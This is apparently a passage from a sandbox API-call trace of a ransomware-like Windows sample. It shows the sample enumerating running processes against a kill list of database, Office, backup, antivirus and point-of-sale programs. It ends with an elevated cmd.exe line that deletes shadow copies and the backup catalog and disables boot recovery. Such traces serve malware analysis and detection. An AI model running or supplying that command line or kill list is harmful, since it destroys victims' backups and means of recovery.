lpString2="sql") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="oracle") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="ocssd") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="dbsnmp") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="synctime") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="agntsvc") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="isqlplussvc") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="xfssvccon") returned -1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="mydesktopservice") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="ocautoupds") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="encsvc") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="firefox") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="tbirdconfig") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="mydesktopqos") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="ocomm") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="dbeng50") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="sqbcoreservice") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="excel") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="infopath") returned 1 [0065.247] lstrcmpiA (lpString1="totalcmd", lpString2="msaccess") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="mspub") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="onenote") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="outlook") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="powerpnt") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="steam") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="thebat") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="thunderbird") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="visio") returned -1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="winword") returned -1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="wordpad") returned -1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="bedbh") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="vxmon") returned -1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="benetns") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="bengien") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="pvlsvr") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="beserver") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="raw_agent_svc") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="vsnapvss") returned -1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="CagService") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="DellSystemDetect") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="EnterpriseClient") returned 1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="VeeamNFSSvc") returned -1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="VeeamTransportSvc") returned -1 [0065.248] lstrcmpiA (lpString1="totalcmd", lpString2="VeeamDeploymentSvc") returned -1 [0065.248] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0065.249] PathRemoveExtensionA (in: pszPath="trillian.exe" | out: pszPath="trillian") [0065.249] lstrcmpiA (lpString1="trillian", lpString2="wxServer") returned -1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="wxServerView") returned -1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="Sqlservr") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="RAgui") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="supervise") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="Culture") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="RTVscan") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="Defwatch") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="sqlbrowser") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="winword") returned -1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="QBW32") returned 1 [0065.249] lstrcmpiA (lpString1="trillian", lpString2="QBDBMgr") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="qbupdate") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="QBCFMonitorService") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="axlbridge") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="QBIDPService") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="httpd") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="fdlauncher") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="MsDtSrvr") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="tomcat6") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="java") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="360se") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="360doctor") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="wdswfsafe") returned -1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="fdhost") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="GDscan") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="ZhuDongFangYu") returned -1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="QBDBMgrN") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="sqlwriter") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="mysqld") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="AutodeskDesktopApp") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="acwebbrowser") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="Creative Cloud") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="Adobe Desktop Service") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="CoreSync") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="Adobe CEF Helper") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="node") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="AdobeIPCBroker") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="sync-taskbar") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="sync-worker") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="InputPersonalization") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="AdobeCollabSync") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="BrCtrlCntr") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="BrCcUxSys") returned 1 [0065.250] lstrcmpiA (lpString1="trillian", lpString2="SimplyConnectionManager") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="Simply.SystemTrayIcon") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="fbguard") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="fbserver") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="ONENOTEM") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="YooIT") returned -1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="wsa_service") returned -1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="koaly-exp-engine-service") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="TeamViewer_Service") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="TeamViewer") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="tv_w32") returned -1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="tv_x64") returned -1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="TitanV") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="Ssms") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="notepad") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="RdrCEF") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="sam") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="sql") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="oracle") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="ocssd") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="dbsnmp") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="synctime") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="agntsvc") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="isqlplussvc") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="xfssvccon") returned -1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="mydesktopservice") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="ocautoupds") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="encsvc") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="firefox") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="tbirdconfig") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="mydesktopqos") returned 1 [0065.251] lstrcmpiA (lpString1="trillian", lpString2="ocomm") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="dbeng50") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="sqbcoreservice") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="excel") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="infopath") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="msaccess") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="mspub") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="onenote") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="outlook") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="powerpnt") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="steam") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="thebat") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="thunderbird") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="visio") returned -1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="winword") returned -1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="wordpad") returned -1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="bedbh") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="vxmon") returned -1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="benetns") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="bengien") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="pvlsvr") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="beserver") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="raw_agent_svc") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="vsnapvss") returned -1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="CagService") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="DellSystemDetect") returned 1 [0065.252] lstrcmpiA (lpString1="trillian", lpString2="EnterpriseClient") returned 1 [0065.253] lstrcmpiA (lpString1="trillian", lpString2="VeeamNFSSvc") returned -1 [0065.253] lstrcmpiA (lpString1="trillian", lpString2="VeeamTransportSvc") returned -1 [0065.253] lstrcmpiA (lpString1="trillian", lpString2="VeeamDeploymentSvc") returned -1 [0065.253] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0065.253] PathRemoveExtensionA (in: pszPath="webdrive.exe" | out: pszPath="webdrive") [0065.253] lstrcmpiA (lpString1="webdrive", lpString2="wxServer") returned -1 [0065.253] lstrcmpiA (lpString1="webdrive", lpString2="wxServerView") returned -1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="Sqlservr") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="RAgui") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="supervise") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="Culture") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="RTVscan") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="Defwatch") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="sqlbrowser") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="winword") returned -1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="QBW32") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="QBDBMgr") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="qbupdate") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="QBCFMonitorService") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="axlbridge") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="QBIDPService") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="httpd") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="fdlauncher") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="MsDtSrvr") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="tomcat6") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="java") returned 1 [0065.254] lstrcmpiA (lpString1="webdrive", lpString2="360se") returned 1 [0065.254] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0065.255] PathRemoveExtensionA (in: pszPath="whatsapp.exe" | out: pszPath="whatsapp") [0065.255] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0065.256] PathRemoveExtensionA (in: pszPath="winscp.exe" | out: pszPath="winscp") [0065.256] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0065.257] PathRemoveExtensionA (in: pszPath="yahoomessenger.exe" | out: pszPath="yahoomessenger") [0065.257] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0065.258] PathRemoveExtensionA (in: pszPath="active-charge.exe" | out: pszPath="active-charge") [0065.258] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0065.258] PathRemoveExtensionA (in: pszPath="accupos.exe" | out: pszPath="accupos") [0065.258] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0065.259] PathRemoveExtensionA (in: pszPath="afr38.exe" | out: pszPath="afr38") [0065.259] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0065.260] PathRemoveExtensionA (in: pszPath="aldelo.exe" | out: pszPath="aldelo") [0065.260] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0065.261] PathRemoveExtensionA (in: pszPath="ccv_server.exe" | out: pszPath="ccv_server") [0065.261] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0065.392] PathRemoveExtensionA (in: pszPath="centralcreditcard.exe" | out: pszPath="centralcreditcard") [0065.393] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0065.394] PathRemoveExtensionA (in: pszPath="creditservice.exe" | out: pszPath="creditservice") [0065.394] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0065.395] PathRemoveExtensionA (in: pszPath="edcsvr.exe" | out: pszPath="edcsvr") [0065.395] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0065.396] PathRemoveExtensionA (in: pszPath="fpos.exe" | out: pszPath="fpos") [0065.396] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0065.396] PathRemoveExtensionA (in: pszPath="isspos.exe" | out: pszPath="isspos") [0065.397] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0065.397] PathRemoveExtensionA (in: pszPath="mxslipstream.exe" | out: pszPath="mxslipstream") [0065.398] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0065.398] PathRemoveExtensionA (in: pszPath="omnipos.exe" | out: pszPath="omnipos") [0065.398] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0065.400] PathRemoveExtensionA (in: pszPath="spcwin.exe" | out: pszPath="spcwin") [0065.400] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0065.401] PathRemoveExtensionA (in: pszPath="spgagentservice.exe" | out: pszPath="spgagentservice") [0065.401] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0065.402] PathRemoveExtensionA (in: pszPath="utg2.exe" | out: pszPath="utg2") [0065.402] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reunion fabrics fed.exe")) returned 1 [0065.403] PathRemoveExtensionA (in: pszPath="reunion fabrics fed.exe" | out: pszPath="reunion fabrics fed") [0065.403] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="work_merchants_mighty.exe")) returned 1 [0065.404] PathRemoveExtensionA (in: pszPath="work_merchants_mighty.exe" | out: pszPath="work_merchants_mighty") [0065.404] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="substances.exe")) returned 1 [0065.405] PathRemoveExtensionA (in: pszPath="substances.exe" | out: pszPath="substances") [0065.405] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="holy.exe")) returned 1 [0065.406] PathRemoveExtensionA (in: pszPath="holy.exe" | out: pszPath="holy") [0065.406] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="debut-debate-acquisition.exe")) returned 1 [0065.407] PathRemoveExtensionA (in: pszPath="debut-debate-acquisition.exe" | out: pszPath="debut-debate-acquisition") [0065.407] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0065.408] PathRemoveExtensionA (in: pszPath="WmiPrvSE.exe" | out: pszPath="WmiPrvSE") [0065.408] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0065.409] PathRemoveExtensionA (in: pszPath="WmiPrvSE.exe" | out: pszPath="WmiPrvSE") [0065.409] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0065.410] PathRemoveExtensionA (in: pszPath="taskhost.exe" | out: pszPath="taskhost") [0065.410] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0065.411] PathRemoveExtensionA (in: pszPath="dllhost.exe" | out: pszPath="dllhost") [0065.411] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0065.412] PathRemoveExtensionA (in: pszPath="dllhost.exe" | out: pszPath="dllhost") [0065.412] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcrqdk.exe")) returned 1 [0065.413] PathRemoveExtensionA (in: pszPath="bcrqdk.exe" | out: pszPath="bcrqdk") [0065.413] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.414] PathRemoveExtensionA (in: pszPath="conhost.exe" | out: pszPath="conhost") [0065.414] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x650056, th32ProcessID=0x610065, th32DefaultHeapID=0x44006d, th32ModuleID=0x700065, cntThreads=0x6f006c, th32ParentProcessID=0x6d0079, pcPriClassBase=7209061, dwFlags=0x530074, szExeFile="vc")) returned 0 [0065.415] CloseHandle (hObject=0x194) returned 1 [0065.415] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0065.416] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0065.416] Wow64DisableWow64FsRedirection (in: OldValue=0x219f3b4 | out: OldValue=0x219f3b4*=0x0) returned 1 [0065.418] ShellExecuteExA (in: pExecInfo=0x219faf4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x77c73cce, lpClass=0x208, hkeyClass=0x210, dwHotKey=0x541d0a, hIcon=0x541d08, hMonitor=0x541d08, hProcess=0x7efac000) | out: pExecInfo=0x219faf4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, 